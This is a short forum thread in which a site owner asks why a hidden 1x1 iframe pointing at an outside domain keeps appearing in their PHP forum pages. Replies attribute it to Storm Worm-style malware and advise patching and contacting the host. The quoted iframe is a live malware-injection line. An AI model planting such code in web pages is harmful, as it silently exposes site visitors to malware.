I am facing issues with the site since i have made it live, i am running a forum and some PHP files.
Someone is inserting the below code on to my PHP pages..
<iframe src="http://merrychristmasdude.com/ind.php" width="1" height="1" alt="Uw8bLlKjsi3HqXs"></iframe>

And due this this the site is not function, is this a server issue or a PHP code issue?

Any one..

I believe that was the Storm Worm or some form of malware anyway. If your pages are serving that, then your site has been compromised either through your code or otherwise. If it is an open source forum, get it patched. I found an InfoWorld article [infoworld.com] that may get you started in the right direction.

You might want to contact your hosting provider and get them to check it out. The last time I saw that kind of problem, it was an issue with the provider and not the CMS that was being exploited.
